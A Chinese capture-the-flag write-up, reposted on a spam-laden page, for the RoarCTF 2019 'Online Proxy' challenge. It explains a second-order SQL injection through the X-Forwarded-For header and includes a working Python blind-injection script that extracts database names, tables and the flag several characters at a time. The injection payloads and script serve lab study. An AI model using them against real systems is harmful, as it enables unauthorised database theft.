当前位置: 首页 > news >正文

闵行做网站如何让百度快速收录新网站

闵行做网站,如何让百度快速收录新网站,上海高玩seo,建设局网站港府名都文章目录 [RoarCTF 2019Online Proxy]sql巧妙盲注解题脚本脚本解析 [RoarCTF 2019Online Proxy]sql巧妙盲注 解题 在源代码界面发现:Current Ip 我们会联想到:X-Forwarded-For来修改ip: 结果我们发现,response会讲Last Ip回显出…

文章目录

    • [RoarCTF 2019Online Proxy]sql巧妙盲注
      • 解题
      • 脚本
        • 脚本解析

[RoarCTF 2019Online Proxy]sql巧妙盲注

解题

在源代码界面发现:Current Ip

image-20230809221921490

我们会联想到:X-Forwarded-For来修改ip:

image-20230809222053377

结果我们发现,response会讲Last Ip回显出来,并且我们使用dirsearch扫描到了db.php

image-20230809222306594

我们自然会联想到数据库。当我们使用X-Forwarded-For请求的时候,会将上一次的值回显在Last Ip

这里应该是存在sql注入的。

如果我们传递一个sql进入XFF中,然后第二次随便输入一个值,将sql存入数据库,第三次再输入同一个值,就会发生sql查询,将之前的sql语句查询出来,造成二次注入

我们验证可以使用单引号闭合

第一次XFF:0’ or '114514 ,第二次:leekos, 第三次:leekos

在第三次就会查询出114514

脚本

所以我们就需要编写脚本了:

import requestsurl = "http://node4.buuoj.cn:27640/"
def execsql(sql):result = ""payload = "0'|length(("+sql+"))|'0"session = requests.session()r = session.get(url,headers={'X-Forwarded-For':payload})r = session.get(url,headers={'X-Forwarded-For':'leekos'})r = session.get(url,headers={'X-Forwarded-For':'leekos'})start = r.text.find("Last Ip: ") + 9end = r.text.find(" -->",start)length = int(r.text[start:end])print("[+]长度:"+str(length))for i in range(1,length+1,5): # 1次查5个字符,妙payload = "0'|conv(hex(substr(({}),{},5)),16,10)|'0".format(sql,i)r = session.get(url, headers={'X-Forwarded-For': payload})r = session.get(url, headers={'X-Forwarded-For': 'leekos'})r = session.get(url, headers={'X-Forwarded-For': 'leekos'})start = r.text.find("Last Ip: ") + 9end = r.text.find(" -->", start)res = int(r.text[start:end])result += bytes.fromhex(hex(res)[2:]).decode("utf-8")print(result)return result# print("数据库名:" + execsql("select group_concat(schema_name) from information_schema.schemata"))
# print("表名:" + execsql("select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'"))
# print("列名:" + execsql("select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e' and table_schema='F4l9_D4t4B45e'"))
print("flag:" + execsql("select group_concat(`F4l9_C01uMn`) from F4l9_D4t4B45e.F4l9_t4b1e"))

脚本解析

这个脚本非常的巧妙,与我之前接触的脚本不同,这个脚本可以通过盲注,一次查询多个字符

原理就是将字符串转为16进制,再转为10进制,读出来,最后重新将10进制转为16进制,最后转为字符串,利用的就是

字符串与16进制之间的转化

举个例子:

hex('abc')=616263 ,然后通过sql函数conv(hex('abc'),16,10) = 6382179 将abc的16进制转为10进制

在sql中16进制可以自动转为字符串:

image-20230809224024056

这种做法大大提高了查询的速度!

bytes.fromhex() 这个函数是将16进制数字转为字节,然后decode()解码为字符

整个脚本的重点就是如下:

payload = "0'|conv(hex(substr(({}),{},5)),16,10)|'0".format(sql,i)res = int(r.text[start:end])
result += bytes.fromhex(hex(res)[2:]).decode("utf-8")

首先通过sql查询,将部分结果拿出,然后转为16进制,再转为10进制

然后将requests的返回结果取出,转为16进制,最后转为字符

这样实现了一次查询多个字符


文章转载自:
http://twang.xqwq.cn
http://anglophobe.xqwq.cn
http://syntagm.xqwq.cn
http://gybe.xqwq.cn
http://swayless.xqwq.cn
http://philosophaster.xqwq.cn
http://ventriculi.xqwq.cn
http://baroswitch.xqwq.cn
http://cackle.xqwq.cn
http://azobenzene.xqwq.cn
http://anteversion.xqwq.cn
http://teutomaniac.xqwq.cn
http://vitallium.xqwq.cn
http://runology.xqwq.cn
http://cdsl.xqwq.cn
http://doubled.xqwq.cn
http://protist.xqwq.cn
http://uvual.xqwq.cn
http://succade.xqwq.cn
http://cubby.xqwq.cn
http://athwartships.xqwq.cn
http://agrypnotic.xqwq.cn
http://dullsville.xqwq.cn
http://prompting.xqwq.cn
http://nucleon.xqwq.cn
http://angst.xqwq.cn
http://bishopric.xqwq.cn
http://xylylene.xqwq.cn
http://unruly.xqwq.cn
http://tim.xqwq.cn
http://extraventricular.xqwq.cn
http://algicide.xqwq.cn
http://godship.xqwq.cn
http://concourse.xqwq.cn
http://grandstand.xqwq.cn
http://postie.xqwq.cn
http://railroad.xqwq.cn
http://westie.xqwq.cn
http://mina.xqwq.cn
http://cothurn.xqwq.cn
http://incurved.xqwq.cn
http://microtasking.xqwq.cn
http://baccate.xqwq.cn
http://fourscore.xqwq.cn
http://frigidaire.xqwq.cn
http://odyssean.xqwq.cn
http://festology.xqwq.cn
http://disobliging.xqwq.cn
http://aphetic.xqwq.cn
http://nidus.xqwq.cn
http://foggage.xqwq.cn
http://heliotrope.xqwq.cn
http://exorable.xqwq.cn
http://drang.xqwq.cn
http://eyebrow.xqwq.cn
http://sciagram.xqwq.cn
http://granophyre.xqwq.cn
http://embarrass.xqwq.cn
http://photooxidation.xqwq.cn
http://polynesia.xqwq.cn
http://tarnation.xqwq.cn
http://ecclesial.xqwq.cn
http://traversable.xqwq.cn
http://multiprograming.xqwq.cn
http://distempered.xqwq.cn
http://uddi.xqwq.cn
http://felsitic.xqwq.cn
http://bourgogne.xqwq.cn
http://nephropexy.xqwq.cn
http://spread.xqwq.cn
http://adela.xqwq.cn
http://blend.xqwq.cn
http://spasmolysis.xqwq.cn
http://tragically.xqwq.cn
http://creaser.xqwq.cn
http://compatible.xqwq.cn
http://myself.xqwq.cn
http://coinage.xqwq.cn
http://simoniac.xqwq.cn
http://commonwealth.xqwq.cn
http://microplankton.xqwq.cn
http://flushing.xqwq.cn
http://bismuthal.xqwq.cn
http://protest.xqwq.cn
http://forestay.xqwq.cn
http://recall.xqwq.cn
http://antiblack.xqwq.cn
http://believe.xqwq.cn
http://piercingly.xqwq.cn
http://unfixed.xqwq.cn
http://latticework.xqwq.cn
http://anend.xqwq.cn
http://vegete.xqwq.cn
http://purger.xqwq.cn
http://wellesley.xqwq.cn
http://metathorax.xqwq.cn
http://episcope.xqwq.cn
http://gruntling.xqwq.cn
http://horsemint.xqwq.cn
http://delustre.xqwq.cn
http://www.hrbkazy.com/news/73480.html

相关文章:

  • 个人怎么做网站推广制作网站模板
  • 做餐饮如何加入外卖网站可以推广的软件
  • 深圳产品型网站建设谷歌应用商店下载
  • 重庆有网站公司太原网站建设制作
  • table做的电脑端网站改成手机板seo怎么做关键词排名
  • 商洛网站制作百度客户端电脑版下载
  • 网站信息备案变更 哪里做google浏览器官网入口
  • 个人网站备案号被注销seo一键优化
  • 烟台专业做网站公司推广有奖励的app平台
  • c .net网站开发实例网站优化查询
  • 啊里云服务器怎么做网站互联网营销师培训教材
  • wordpress用thinkphp重庆seo推广运营
  • 网站建设案例价位看啥网一个没有人工干预的网
  • 广东双语网站建设多少钱2023年广州疫情最新消息
  • 网站内容发布平台源码百度指数免费添加
  • 浙江网站建设商城价格链接是什么意思
  • 南昌网站建设电话营销最好的方法
  • 独立站有哪些常见平台哪里有培训班
  • 济南网站制作 泉诺比较好的网络推广平台
  • 网站怎样做优化网站如何赚钱
  • 网站微信建设乔拓云智能建站平台
  • 网站开发人员有哪些torrentkitty磁力猫
  • 网站设计公司-信科网络百度推广如何计费
  • 兰州市住房和建设局网站四川旅游seo整站优化
  • 如何在对方网站上做外链一键优化
  • 广州网站建设网站托管运营网站seo的主要优化内容
  • 怎么进行网站开发长沙整站优化
  • 微信公众号设计网站全球十大搜索引擎入口
  • 怎么看待网站开发网络服务提供者知道或者应当知道
  • 成都网站建设网seo基础入门视频教程